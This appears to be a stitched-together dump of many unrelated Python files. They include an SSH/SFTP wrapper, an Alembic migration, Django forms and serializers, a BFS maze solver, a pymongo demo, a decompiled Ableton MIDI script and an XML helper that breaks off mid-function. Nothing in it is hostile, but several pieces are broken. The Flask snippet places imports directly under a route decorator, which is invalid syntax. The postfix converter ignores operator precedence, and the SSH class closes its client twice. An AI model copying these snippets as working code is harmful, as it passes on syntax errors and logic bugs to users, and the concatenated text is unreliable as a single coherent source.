self._sftp = self._client.open_sftp()
return connection
def listdir(self, remotepath='.'):
"""List all files."""
return self._sftp.listdir(remotepath)
def get(self, remotepath, localpath=None):
"""Copies a file between the remote host and the local host."""
if not localpath:
localpath = os.path.split(remotepath)[1]
self._sftp.get(remotepath, localpath)
def put(self, localpath, remotepath=None):
"""Copies a file between the local host and the remote host."""
if not remotepath:
remotepath = os.path.split(localpath)[1]
self._sftp.put(localpath, remotepath)
def execute(self, command, timeout=None):
"""Execute the given commands on a remote machine with stdout and stderr."""
channel = self._transport.open_session()
if timeout is not None:
channel.settimeout(timeout)
channel.get_pty()
output = channel.makefile()
channel.exec_command(command)
return output.readlines()
def close(self):
"""Closes the connection and cleans up."""
self._client.close()
self._client = None
def __del__(self):
"""Attempt to clean up if not explicitly closed."""
self.close()
if self._client:
self._client.close()
self._client = None
def main():
"""Little test when called directly."""
host = raw_input('host/ip:')
username = raw_input('username:')
password = raw_input('password:')
myssh = Connection(host, username, password)
print myssh.listdir()
myssh.close()
if __name__ == '__main__':
main()
|
class Stack:
def __init__(self, list=None):
if list == None:
self.items = []
self.len = 0
else:
self.items = list
self.len = len(list)
def push(self, item):
self.items.append(item)
self.len += 1
def pop(self):
self.len -= 1
return self.items.pop()
def peek(self):
return self.items[self.size()-1]
def size(self):
return self.len
def isEmpty(self):
return self.len == 0
def postfix(eq):
prec = {'*':4, '/':3, '+':2, '-':1}
s = Stack()
eq.split()
r = ''
for a in eq:
if a.isalpha() or a.isalnum():
r += a
elif a in "+-":
if s.isEmpty() or s.peek() == '(':
s.push(a)
elif a in "*/":
if s.isEmpty() or s.peek() in "+-(":
s.push(a)
elif a == '(':
s.push(a)
elif a == ')':
while s.peek() is not '(':
r += s.pop()
s.pop()
else:
print("Error")
while not s.isEmpty():
r += s.pop()
return r
print(postfix('(a+b)*c-d')) |
""" 模型
Revision ID: e3729b5abc40
Revises:
Create Date: 2018-10-27 13:13:38.276381
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e3729b5abc40'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('novels',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('book_name', sa.String(length=64), nullable=True),
sa.Column('author', sa.String(length=64), nullable=True),
sa.Column('image', sa.Binary(), nullable=True),
sa.Column('last_update', sa.String(length=64), nullable=True),
sa.Column('about_book', sa.Text(), nullable=True),
sa.Column('book_url', sa.String(length=128), nullable=True),
sa.Column('search_name', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_novels_author'), 'novels', ['author'], unique=False)
op.create_index(op.f('ix_novels_book_name'), 'novels', ['book_name'], unique=False)
op.create_table('chapters',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('chapter_name', sa.String(length=128), nullable=True),
sa.Column('chapter_url', sa.String(length=128), nullable=True),
sa.Column('chapter_number', sa.Integer(), nullable=True),
sa.Column('book_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['book_id'], ['novels.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_chapters_chapter_number'), 'chapters', ['chapter_number'], unique=False)
op.create_table('contents',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('chapter_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['chapter_id'], ['chapters.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('contents')
op.drop_index(op.f('ix_chapters_chapter_number'), table_name='chapters')
op.drop_table('chapters')
op.drop_index(op.f('ix_novels_book_name'), table_name='novels')
op.drop_index(op.f('ix_novels_author'), table_name='novels')
op.drop_table('novels')
# ### end Alembic commands ###
|
#!/usr/bin/env python
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import sys
from typing import Any, Dict, cast
import setuptools
def get_version() -> str:
onefuzz: Dict[str, Any] = {}
with open("onefuzz/__version__.py") as fh:
# Exec our own __version__.py to pull out version string
# without import
exec(fh.read(), onefuzz) # nosec
version = onefuzz["__version__"]
if "-v" in sys.argv:
index = sys.argv.index("-v")
sys.argv.pop(index)
version += ".dev" + sys.argv.pop(index)
return cast(str, version)
with open("requirements.txt") as f:
requirements = f.read().splitlines()
# remove any installer options (see pydantic example)
requirements = [x.split(" ")[0] for x in requirements]
setuptools.setup(
name="onefuzz",
version=get_version(),
description="Onefuzz Client Library for Python",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/microsoft/onefuzz/",
author="Microsoft Corporation",
author_email="fuzzing@microsoft.com",
license="MIT",
packages=setuptools.find_packages(),
entry_points={"console_scripts": ["onefuzz = onefuzz.__main__:main"]},
install_requires=requirements,
zip_safe=False,
include_package_data=True,
package_data={
"": ["*.md", "*.txt", "onefuzz/data/licenses.json", "onefuzz/data/privacy.txt"]
},
)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""pybej.py
Author: William Yao <LNYK@ME.COM> at <LNYK2.COM>
Date : 2015.05.27
A very simple script to catalyse your headsets.
USE IT UNDER YOUR OWN RISK!
"""
class Locale():
def __init__(self, lang='en'):
self.trans = None
zh_CN = {'i.1': u'欢迎使用 pybej 煲耳机小程序!\n\n注意:不适当的煲耳机过程有可能会损坏您的设备,请谨慎使用!\n',
'i.2': u'扫频的起始频率(例如 100):',
'i.3': u'扫频的终止频率(例如 15000):',
'i.4': u'扫频的单次循环时长(单位秒,例如 5):',
'i.5': u'此次任务的计划用时(格式:时,分,秒 例如 72,0,0):',
'i.6': u'自动休息每隔(格式:时,分,秒 例如 2,0,0):',
'i.7': u'每次休息时长(格式:时,分,秒 例如 0,30,0):',
'i.8': u'本次计划如下\n\n扫频范围:%s - %s\n扫频时长:%s\n计划用时:%s\n每隔 %s 自动休息\n每次休息 %s\n',
'i.9': u'以上为本次计划内容,请确认内容并按回车键继续!\n如需放弃,请按 Ctrl+C 或直接关闭窗口!\n',
'i.10': u'扫频任务即将开始,请将输出设备音量调至最低。\n按回车键,等待扫频开始后逐渐增大音量至所需位置!\n扫频期间按 Ctrl+C 退出,或直接关闭窗口。\n',
'i.11': u'[开始时间 %s][计划用时 %s][剩余时间 %s]\n',
'i.12': u'[自动休息 %s][预计于 %s 自动恢复扫频]\n',
'i.13': u'任务完成!\n本次任务\n开始于 %s\n结束于 %s\n计划用时 %s\n实际用时 %s\n其中包含休息用时 %s\n共休息 %s 次\n',
'i.14': u'临时文件清理完毕!\n',
'i.15': u'欢迎访问 http://blog.lnyk2.com 了解更新内容!\n\n再次感谢您对 pybej 煲耳机小程序的支持!\n软件就应开源!',
'e.1': u'输入有误,请检查输入内容是否符合要求!\n',
'e.2': u'请注意,频率设置可能过低!建议不要低于 15!',
'e.3': u'请注意,频率设置可能过高!建议不要高于 22000',
}
en = {'i.a': 'Please choose your language: \n',
'i.l1': '1. English\n',
'i.l2': u'2. 简体中文\n',
'e.1': 'Input error! Please check your input again!\n',
}
if lang == 'zh_CN':
self.trans = zh_CN
elif lang == 'en':
self.trans = en
|
import re
# print(re.findall(r'paper/\d+/reference','paper/1559136758/reference'))
# temp = ' CITATIONS* (1,318)'
#
# '''
# CITATIONS* (567)
# CITATIONS* (1,318)
# CITATIONS* (460)
# CITATIONS* (481)
# CITATIONS* (603)
# CITATIONS* (136)
# '''
# Citation_Count= re.findall('\(.+\)', temp)[0][1:-1]
# print(Citation_Count)
# base_url = r'https://academic.microsoft.com/search?q=blockchain&f=&orderBy=0&skip={}&take=10'
#
# with open('urls.txt', 'w', encoding='utf-8') as f:
# for i in range(0, 4990 + 1):
# f.write(base_url.format(i * 10)+"\n")
# print(i)
text = {
"url": "https://academic.microsoft.com/paper/1559136758/reference",
"Pub_Title": "Decentralizing Privacy: Using Blockchain to Protect Personal Data",
"Year": "2015",
"Pub_Outlet": "IEEE Symposium on Security and Privacy",
"Citation_Count": "567",
"Abstract": "The recent increase in reported incidents of surveillance and security breaches compromising users' privacy call into question the current model, in which third-parties collect and control massive amounts of personal data. Bit coin has demonstrated in the financial space that trusted, auditable computing is possible using a decentralized network of peers accompanied by a public ledger. In this paper, we describe a decentralized personal data management system that ensures users own and control their data. We implement a protocol that turns a block chain into an automated access-control manager that does not require trust in a third party. Unlike Bit coin, transactions in our system are not strictly financial -- they are used to carry instructions, such as storing, querying and sharing data. Finally, we discuss possible future extensions to block chains that could harness them into a well-rounded solution for trusted computing problems in society.",
"Author": [
[
"Guy Zyskind",
"Massachusetts Institute of Technology"
],
[
"Oz Nathan",
"Tel Aviv University"
],
[
"Alex 'Sandy' Pentland",
"Massachusetts Institute of Technology"
]
],
"Tag": [
"Trusted Computing",
"Privacy software",
"Privacy by Design",
"Ledger",
"Internet privacy",
"Information privacy",
"Data management",
"Computer security",
"Computer science",
"Blockchain"
]
}
print(len(text['Author']))
# if len(text['Author']) < 12:
try:
Author1 = text['Author'][0][0]
Author1_Insttute = text['Author'][0][1]
Author2 = text['Author'][1][0]
Author2_Insttute = text['Author'][1][1]
Author3 = text['Author'][2][0]
Author3_Insttute = text['Author'][2][1]
Author4 = text['Author'][3][0]
Author4_Insttute = text['Author'][3][1]
Author5 = text['Author'][4][0]
Author5_Insttute = text['Author'][4][1]
Author6 = text['Author'][5][0]
Author6_Insttute = text['Author'][5][1]
Author7 = text['Author'][6][0]
Author7_Insttute = text['Author'][6][1]
Author8 = text['Author'][7][0]
Author8_Insttute = text['Author'][7][1]
Author9 = text['Author'][8][0]
Author9_Insttute = text['Author'][8][1]
Author10 = text['Author'][9][0]
Author10_Insttute = text['Author'][9][1]
Author11 = text['Author'][10][0]
Author11_Insttute = text['Author'][10][1]
Author12 = text['Author'][11][0]
Author12_Insttute = text['Author'][11][1]
except Exception as e:
print(e)
|
from django import forms
class CtsQueryForm(forms.Form):
ctsproductnum = forms.CharField(required=False,max_length=20,widget=forms.TextInput(attrs={'placeholder':'请输入商品编码','class': 'form-control'}))
ctssellcountmin = forms.CharField(required=False,max_length=20,widget=forms.TextInput(attrs={'placeholder':'请输入商品销量下限','class': 'form-control'}))
ctssellcountmax = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '请输入商品销量上限', 'class': 'form-control'}))
ctscaldateflag = forms.BooleanField(required=False, widget=forms.CheckboxInput())
ctscaldate = forms.DateField(required=False,widget=forms.DateInput(attrs={'class': 'form-control','placeholder':'统计日期:yyyy-mm-dd'}))
ctscaldepart = forms.CharField(required=False)
class CtsMakeForm(forms.Form):
ctsmakedate = forms.DateField(required=False,widget=forms.DateInput(attrs={'class': 'form-control','placeholder':'制作日期:yyyy-mm-dd'}))
ctsmakedepart = forms.CharField(required=False)
class KckQueryForm(forms.Form):
kckproductid = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '宝贝ID', 'class': 'form-control'}))
kckproductcolornum = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '货号(到色)', 'class': 'form-control'}))
kckproductcategory = forms.CharField(required=False, max_length=20, widget=forms.TextInput(attrs={'placeholder': '类目', 'class': 'form-control'}))
kckshelfdateflag = forms.BooleanField(required=False, widget=forms.CheckboxInput())
kckshelfdate = forms.DateField(required=False, widget=forms.DateInput(attrs={'class': 'form-control', 'placeholder': '上架日期:yyyy-mm-dd'}))
kckseldepart = forms.CharField(required=False)
kckselstore = forms.CharField(required=False)
class KckAddForm(forms.Form):
kckproductid = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '宝贝ID', 'class': 'form-control'}))
kckproductcolornum = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '货号(到色)', 'class': 'form-control'}))
kckproductcategory = forms.CharField(required=False, max_length=20, widget=forms.TextInput(attrs={'placeholder': '类目', 'class': 'form-control'}))
kckshelfdate = forms.DateField(required=False, widget=forms.DateInput(attrs={'class': 'form-control', 'placeholder': '上架日期:yyyy-mm-dd'}))
kckseldepart = forms.CharField(required=False)
kckselstore = forms.CharField(required=False)
class KckEditForm(forms.Form):
kckid = forms.CharField(required=False)
kckproductid = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '宝贝ID', 'class': 'form-control'}))
kckproductcolornum = forms.CharField(required=False, max_length=20, widget=forms.TextInput(attrs={'placeholder': '货号(到色)', 'class': 'form-control'}))
kckproductcategory = forms.CharField(required=False, max_length=20,widget=forms.TextInput(attrs={'placeholder': '类目', 'class': 'form-control'}))
kckshelfdate = forms.DateField(required=False, widget=forms.DateInput(attrs={'class': 'form-control', 'placeholder': '上架日期:yyyy-mm-dd'}))
kckseldepart = forms.CharField(required=False)
kckselstore = forms.CharField(required=False) |
from rest_framework.filters import OrderingFilter
from rest_framework_filters.backends import RestFrameworkFilterBackend, ComplexFilterBackend
from rest_framework_filters_nkg.filterset import FilterSetNkg
from rest_framework_filters_nkg.utils import *
parent_fields = ['ForeignField', 'PrimaryKeyRelatedField']
number_fields = ['IntegerField', 'FloatField', 'DateField', 'DateTimeField', 'BooleanField']
string_fields = ['CharField', 'TextField', 'ChoiceField']
class ComplexFilterNkgBackend(ComplexFilterBackend):
"""
Extends for support of:
``view.filterset_fields = '__all__'`` - for extract filterset_fields from serializer or model (if serializer is None)
``view.filterset_extra_fields`` = {field: [lookups]} - for add extra fieldset ie. related fields
``view.computed_filter_fields`` = [field_name_list] - for computed field, added to queryset by annotation or extra method
"""
filterset_base = FilterSetNkg
def get_filterset_class(self, view, queryset=None):
filterset_class = getattr(view, 'filterset_class', None)
filterset_fields = getattr(view, 'filterset_fields', None)
annotated_fields = {}
fields = {}
if filterset_class is not None:
return super().get_filterset_class(view, queryset)
if filterset_fields != '__all__':
return super().get_filterset_class(view, queryset)
if queryset is not None:
MetaBase = getattr(self.filterset_base, 'Meta', object)
model = queryset.model
# Get serializer class
if hasattr(view, 'get_serializer_class'):
try:
serializer_class = view.get_serializer_class()
except AssertionError:
serializer_class = None
else:
serializer_class = getattr(view, 'serializer_class', None)
if serializer_class is None:
# Extract fields names and types from model
for f in model._meta.get_fields():
fields[f.get_attname()] = f.get_internal_type()
else:
# Extract fields names and types from serializer
for name, f in serializer_class(context={}).fields.fields.items():
if not f.write_only:
fields[name] = type(f).__name__
model_fields = {}
extra_filter_fields = getattr(view, 'filterset_extra_fields', {})
computed_filter_fields = getattr(view, 'filterset_computed_fields', [])
filterset_ignore = getattr(view, 'filterset_ignore', [])
# sort fields from serializer/model by model or computed and assign lookups by value type
for name, field_type in fields.items():
if name in filterset_ignore:
continue
elif name in computed_filter_fields:
dest = annotated_fields
else:
dest = model_fields
if field_type in parent_fields:
dest[name] = parent_lokup
if field_type in number_fields:
dest[name] = number_lokups
if field_type in string_fields:
dest[name] = string_lokups
# append extra fields and sort by model or computed
for name, fl in extra_filter_fields.items():
if name in computed_filter_fields:
dest = annotated_fields
else:
dest = model_fields
dest[name] = fl
# make filter
class AutoFilterSet(self.filterset_base):
class Meta(MetaBase):
model = queryset.model
fields = model_fields
computed_fields = annotated_fields
return AutoFilterSet
return None
|
import math
import numpy as np
from algorithms import center_of_mass
def test_center_of_mass_impulse():
image = np.zeros(10)
image[4] = 1.0
assert center_of_mass(image) == 4.0
def test_center_of_mass_rect():
image = np.zeros(10)
image[4] = 1.0
image[5] = 1.0
assert math.isclose(center_of_mass(image), 4.5)
def test_center_of_mass_varying_density():
image = np.zeros(10)
image[0] = 1.0
image[3] = 2.0
assert math.isclose(center_of_mass(image), 2.0)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 27 21:15:04 2018
@author: Iswariya Manivannan
"""
import sys
import os
from collections import deque
from helper import maze_map_to_tree, write_to_file, assign_character_for_nodes
from helper import start_pose, print_maze, clear_screen
import time
def breadth_first_search(maze_map):
"""Function to implement the BFS algorithm.
Please use the functions in helper.py to complete the algorithm.
Please do not clutter the code this file by adding extra functions.
Additional functions if required should be added in helper.py
Parameters
----------
maze_map : [type]
[description]
start_pos : [type]
[description]
goal_pos : [type]
[description]
Returns
-------
[type]
[description]
"""
start = start_pose(maze_map)
iterable = maze_map_to_tree(maze_map)
# queue = deque([(iterable, start)])
# Fill in your BFS algorithm here
fringe = [start]
visited = []
fringe.extend(iterable[start])
while fringe:
# print(fringe)
parent_node = fringe.pop(0)
# print(fringe)
for child_node in iterable[parent_node]:
if child_node not in visited and maze_map[parent_node[0]][parent_node[1]] != '=' and maze_map[parent_node[0]][parent_node[1]]!= '|':
new_map = assign_character_for_nodes(maze_map, child_node, parent_node)
print_maze(new_map)
fringe.append(child_node)
visited.append(child_node)
return new_map
if __name__ == '__main__':
working_directory = os.getcwd()
if len(sys.argv) > 1:
map_directory = sys.argv[1]
else:
map_directory = 'maps'
file_path_map1 = os.path.join(working_directory, map_directory + '/map1.txt')
file_path_map2 = os.path.join(working_directory, map_directory + '/map2.txt')
file_path_map3 = os.path.join(working_directory, map_directory + '/map3.txt')
maze_map_map1 = []
with open(file_path_map1) as f1:
maze_map_map1 = f1.readlines()
maze_map_map2 = []
with open(file_path_map2) as f2:
maze_map_map2 = f2.readlines()
maze_map_map3 = []
with open(file_path_map3) as f3:
maze_map_map3 = f3.readlines()
breadth_first_search(maze_map_map2)
# CALL THIS FUNCTIONS after filling in the necessary implementations
# path_map1 = breadth_first_search(maze_map_map1)
# write_to_file("bdf_map1", path_map1)
# path_map2 = breadth_first_search(maze_map_map2)
# write_to_file("bdf_map2", path_map2)
# path_map3 = breadth_first_search(maze_map_map3)
# write_to_file("bdf_map3", path_map3)
|
import pymongo
from pymongo import Connection
connection = Connection()
# Удалить БД, если она существует
connection.drop_database("server_database")
# Выбираем БД
db = connection["server_database"]
# Удалить коллекцию
db.drop_collection('users')
# Добавление документов в колекцию 'users'
def insert_user_data(login, hash_sz):
db.users.save( { 'username':login, 'hash':hash_sz } )
def delete_user_data(login):
db.users.remove( {'username':login} )
def update_username(login, new_login):
db.users.update( {'username':login}, {"$set" : {'username':new_login} } )
def update_hash(login, new_hash):
db.users.update( {'username':login}, {"$set" : {'hash':new_hash} } )
# Получить все документы
def print_list(db):
for user in db.users.find():
print (user)
#examples
insert_user_data(1, 12345)
insert_user_data(2, 12345)
insert_user_data(3, 12345)
print_list(db)
delete_user_data(1)
print_list(db)
update_username(2, 5)
update_hash(3, 11111)
print_list(db)
|
from django.conf import settings
from rest_framework import serializers
from openbook.settings import COLOR_ATTR_MAX_LENGTH
from openbook_categories.models import Category
from openbook_categories.validators import category_name_exists
from openbook_common.serializers import CommonCommunityMembershipSerializer
from openbook_common.serializers_fields.community import CommunityPostsCountField
from openbook_common.serializers_fields.request import RestrictedImageFileSizeField
from openbook_common.validators import hex_color_validator
from openbook_communities.models import Community
from openbook_communities.serializers_fields import IsInvitedField, IsCreatorField, CommunityMembershipsField, \
IsFavoriteField, AreNewPostNotificationsEnabledForCommunityField
from openbook_communities.validators import community_name_characters_validator, community_name_not_taken_validator
class CreateCommunitySerializer(serializers.Serializer):
type = serializers.ChoiceField(allow_blank=False, choices=Community.COMMUNITY_TYPES)
name = serializers.CharField(max_length=settings.COMMUNITY_NAME_MAX_LENGTH,
allow_blank=False, validators=[community_name_characters_validator])
title = serializers.CharField(max_length=settings.COMMUNITY_TITLE_MAX_LENGTH,
allow_blank=False)
description = serializers.CharField(max_length=settings.COMMUNITY_DESCRIPTION_MAX_LENGTH,
allow_blank=True, required=False)
rules = serializers.CharField(max_length=settings.COMMUNITY_RULES_MAX_LENGTH,
allow_blank=True, required=False)
user_adjective = serializers.CharField(max_length=settings.COMMUNITY_USER_ADJECTIVE_MAX_LENGTH,
allow_blank=False, required=False)
users_adjective = serializers.CharField(max_length=settings.COMMUNITY_USERS_ADJECTIVE_MAX_LENGTH,
allow_blank=False, required=False)
avatar = RestrictedImageFileSizeField(required=False,
max_upload_size=settings.COMMUNITY_AVATAR_MAX_SIZE)
cover = RestrictedImageFileSizeField(required=False,
max_upload_size=settings.COMMUNITY_COVER_MAX_SIZE)
invites_enabled = serializers.BooleanField(required=False)
color = serializers.CharField(max_length=COLOR_ATTR_MAX_LENGTH, required=True,
validators=[hex_color_validator])
categories = serializers.ListField(
required=True,
min_length=settings.COMMUNITY_CATEGORIES_MIN_AMOUNT,
max_length=settings.COMMUNITY_CATEGORIES_MAX_AMOUNT,
child=serializers.CharField(max_length=settings.HASHTAG_NAME_MAX_LENGTH, validators=[category_name_exists]),
)
class CommunityNameCheckSerializer(serializers.Serializer):
name = serializers.CharField(max_length=settings.COMMUNITY_NAME_MAX_LENGTH,
allow_blank=False,
validators=[community_name_characters_validator, community_name_not_taken_validator])
class GetJoinedCommunitiesSerializer(serializers.Serializer):
count = serializers.IntegerField(
required=False,
max_value=20
)
offset = serializers.IntegerField(
required=False,
)
class GetModeratedCommunitiesSerializer(serializers.Serializer):
count = serializers.IntegerField(
required=False,
max_value=20
)
offset = serializers.IntegerField(
required=False,
)
class GetAdministratedCommunitiesSerializer(serializers.Serializer):
count = serializers.IntegerField(
required=False,
max_value=20
)
offset = serializers.IntegerField(
required=False,
)
class GetFavoriteCommunitiesSerializer(serializers.Serializer):
count = serializers.IntegerField(
required=False,
max_value=20
)
offset = serializers.IntegerField(
required=False,
)
class TrendingCommunitiesSerializer(serializers.Serializer):
category = serializers.CharField(max_length=settings.CATEGORY_NAME_MAX_LENGTH,
allow_blank=True,
required=False,
validators=[category_name_exists])
class GetCommunitiesCommunityCategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = (
'id',
'name',
'title',
'color'
)
class CommunitiesCommunitySerializer(serializers.ModelSerializer):
categories = GetCommunitiesCommunityCategorySerializer(many=True)
is_invited = IsInvitedField()
are_new_post_notifications_enabled = AreNewPostNotificationsEnabledForCommunityField()
is_favorite = IsFavoriteField()
is_creator = IsCreatorField()
posts_count = CommunityPostsCountField()
memberships = CommunityMembershipsField(community_membership_serializer=CommonCommunityMembershipSerializer)
class Meta:
model = Community
fields = (
'id',
'name',
'title',
'avatar',
'cover',
'members_count',
'posts_count',
'color',
'user_adjective',
'users_adjective',
'categories',
'type',
'is_invited',
'are_new_post_notifications_enabled',
'is_favorite',
'is_creator',
'invites_enabled',
'memberships'
)
class SuggestedCommunitiesCommunitySerializer(serializers.ModelSerializer):
is_creator = IsCreatorField()
memberships = CommunityMembershipsField(community_membership_serializer=CommonCommunityMembershipSerializer)
class Meta:
model = Community
fields = (
'id',
'name',
'title',
'avatar',
'cover',
'members_count',
'color',
'user_adjective',
'users_adjective',
'is_creator',
'memberships'
)
|
import socket
def get_machine_info():
host_name = socket.gethostname()
ip_address = socket.gethostbyname(host_name)
print("host name is: \t %s " % host_name)
print("This machines IP address is: \t %s" % ip_address)
get_machine_info()
|
import json, os, re, dateutil.parser
from nltk.tokenize import word_tokenize
import string
from nltk.corpus import stopwords
import nltk
import markdown2
from bs4 import BeautifulSoup
nltk.download('punkt')
nltk.download('stopwords')
repos = ['react', 'angular', 'vue', 'backbone', 'ember.js', 'jquery']
fields = ['title', 'body', 'num', 'd']
for repo in repos:
with open('%s_issues_dirty.json' % repo, 'r') as dirty:
issues = json.loads(dirty.read())
for issue in issues:
num = None
d = None
for field in list(issue.keys()):
if field == 'url':
search = re.search('(\d+)', issue['url'])
num = search.group(0)
if field == 'created_at':
date = dateutil.parser.parse(issue['created_at'])
d = '{}/{}'.format(date.month, date.year)
if (field == 'title' or field == 'body'):
text = markdown2.markdown(issue[field]) if issue[field] is not None else ''
soup = BeautifulSoup(text, 'html.parser')
for tag in soup.find_all('code'):
tag.replaceWith('')
text = markdown2.markdown(soup.get_text())
text = re.sub('<[^<]+?>', '', text)
text = re.sub(r"http\S+", "", text)
tokens = word_tokenize(text)
tokens = [w.lower() for w in tokens]
table = str.maketrans('', '', string.punctuation)
stripped = [w.translate(table) for w in tokens]
words = [word for word in stripped if word.isalpha()]
stop_words = set(stopwords.words('english'))
words = [w for w in words if not w in stop_words]
issue[field] = ' '.join(words)
if field not in fields:
del issue[field]
if num is not None:
issue['num'] = num
if d is not None:
issue['d'] = d
with open('%s_issues_clean.json' % repo, 'w+') as clean:
json.dump(issues, clean)
os.remove('%s_issues_dirty.json' % repo) |
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.5 (default, Aug 12 2020, 00:00:00)
# [GCC 10.2.1 20200723 (Red Hat 10.2.1-1)]
# Embedded file name: C:\ProgramData\Ableton\Live 9.7 Suite\Resources\MIDI Remote Scripts\_NKFW2\ModifierMixin.py
# Compiled at: 2017-03-07 13:28:52
from _Framework.SubjectSlot import subject_slot
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent
from _Framework.Disconnectable import Disconnectable
class ModifierMixin(Disconnectable):
""" ModifierMixin handles all of the modifier buttons a class may need. It can purely
provide setters and references to modifier buttons or it can also provide listeners,
LED handling and call a callback upon modifier button values being received.
This module also includes a ModifierOwnerComponent, which is just a CSC that
implements this mixin."""
def __init__(self, handle_modifier_leds=True, press_callback=None):
super(ModifierMixin, self).__init__()
self._handle_modifier_leds = bool(handle_modifier_leds)
self._press_callback = press_callback
self._shift_button = None
self._select_button = None
self._mute_button = None
self._solo_button = None
self._delete_button = None
self._duplicate_button = None
self._double_button = None
self._quantize_button = None
return
def disconnect(self):
super(ModifierMixin, self).disconnect()
self._press_callback = None
self._shift_button = None
self._select_button = None
self._mute_button = None
self._solo_button = None
self._delete_button = None
self._duplicate_button = None
self._double_button = None
self._quantize_button = None
return
def set_shift_button(self, button):
self._shift_button = button
self._set_modifier(button, 'shift')
def set_select_button(self, button):
self._select_button = button
self._set_modifier(button, 'select')
def set_mute_button(self, button):
self._mute_button = button
self._set_modifier(button, 'mute')
def set_solo_button(self, button):
self._solo_button = button
self._set_modifier(button, 'solo')
def set_delete_button(self, button):
self._delete_button = button
self._set_modifier(button, 'delete')
def set_duplicate_button(self, button):
self._duplicate_button = button
self._set_modifier(button, 'duplicate')
def set_double_button(self, button):
self._double_button = button
self._set_modifier(button, 'double')
def set_quantize_button(self, button):
self._quantize_button = button
self._set_modifier(button, 'quantize')
def update_modifier_leds(self):
if self.is_enabled() and self._handle_modifier_leds:
if self._shift_button:
self._shift_button.set_light('Modifiers.Shift')
if self._select_button:
self._select_button.set_light('Modifiers.Select')
if self._mute_button:
self._mute_button.set_light('Modifiers.Mute')
if self._solo_button:
self._solo_button.set_light('Modifiers.Solo')
if self._delete_button:
self._delete_button.set_light('Modifiers.Delete')
if self._duplicate_button:
self._duplicate_button.set_light('Modifiers.Duplicate')
if self._double_button:
self._double_button.set_light('Modifiers.Double')
if self._quantize_button:
self._quantize_button.set_light('Modifiers.Quantize')
def _set_modifier(self, button, modifier_name):
if self._handle_modifier_leds:
getattr(self, '_on_%s_button_value' % modifier_name).subject = button
if self.is_enabled() and button:
button.set_light('Modifiers.%s' % modifier_name.title())
@subject_slot('value')
def _on_shift_button_value(self, value):
self._handle_modifier_value(value, 'shift')
@subject_slot('value')
def _on_select_button_value(self, value):
self._handle_modifier_value(value, 'select')
@subject_slot('value')
def _on_mute_button_value(self, value):
self._handle_modifier_value(value, 'mute')
@subject_slot('value')
def _on_solo_button_value(self, value):
self._handle_modifier_value(value, 'solo')
@subject_slot('value')
def _on_delete_button_value(self, value):
self._handle_modifier_value(value, 'delete')
@subject_slot('value')
def _on_duplicate_button_value(self, value):
self._handle_modifier_value(value, 'duplicate')
@subject_slot('value')
def _on_double_button_value(self, value):
self._handle_modifier_value(value, 'double')
@subject_slot('value')
def _on_quantize_button_value(self, value):
self._handle_modifier_value(value, 'quantize')
def _handle_modifier_value(self, value, modifier_name):
if self.is_enabled():
button = getattr(self, '_on_%s_button_value' % modifier_name).subject
if button:
if self._press_callback:
self._press_callback(bool(value), modifier_name)
button.set_light('Modifiers.Pressed' if value else 'Modifiers.%s' % modifier_name.title())
class ModifierOwnerComponent(ControlSurfaceComponent, ModifierMixin):
""" Simple component that implements the ModifierMixin. """
def update(self):
super(ModifierOwnerComponent, self).update()
self.update_modifier_leds()
# okay decompiling /home/deniz/data/projects/midiremote/Live 10.1.18/_NKFW2/ModifierMixin.pyc
|
# This sample tests various type checking operations relating to
# generator functions that use the "yield from" clause.
from typing import Iterator
class ClassA:
pass
class ClassB:
def shouldContinue(self):
return True
class ClassC:
pass
def generator1() -> Iterator[ClassA]:
yield from generator1()
def generator2() -> Iterator[ClassB]:
# This should generate an error because it yields
# an iterator of the wrong type.
yield from generator1()
# This should also generate an error because it
# yields the wrong type.
yield from [1]
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# For this assignment, we need to load in the following modules
import requests
import StringIO
import zipfile
import scipy.stats
def getZIP(zipFileName):
r = requests.get(zipFileName).content
s = StringIO.StringIO(r)
zf = zipfile.ZipFile(s, 'r') # Read in a list of zipped files
return zf
url = 'http://seanlahman.com/files/database/lahman-csv_2014-02-14.zip'
zf = getZIP(url)
print zf.namelist()
if __name__ == "__main__":
app.run() |
#============================================================================
#Name : xmlhelper.py
#Part of : Helium
#Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).
#All rights reserved.
#This component and the accompanying materials are made available
#under the terms of the License "Eclipse Public License v1.0"
#which accompanies this distribution, and is available
#at the URL "http://www.eclipse.org/legal/epl-v10.html".
#
#Initial Contributors:
#Nokia Corporation - initial contribution.
#
#Contributors:
#
#Description:
#===============================================================================
""" XML helper"""
import re
from xml.dom import Node
def node_scan(node, name):
"""
Replacement function for node.xml_xpath('./name').
name is a regular expression.
"""
results = []
for subnode in node.childNodes:
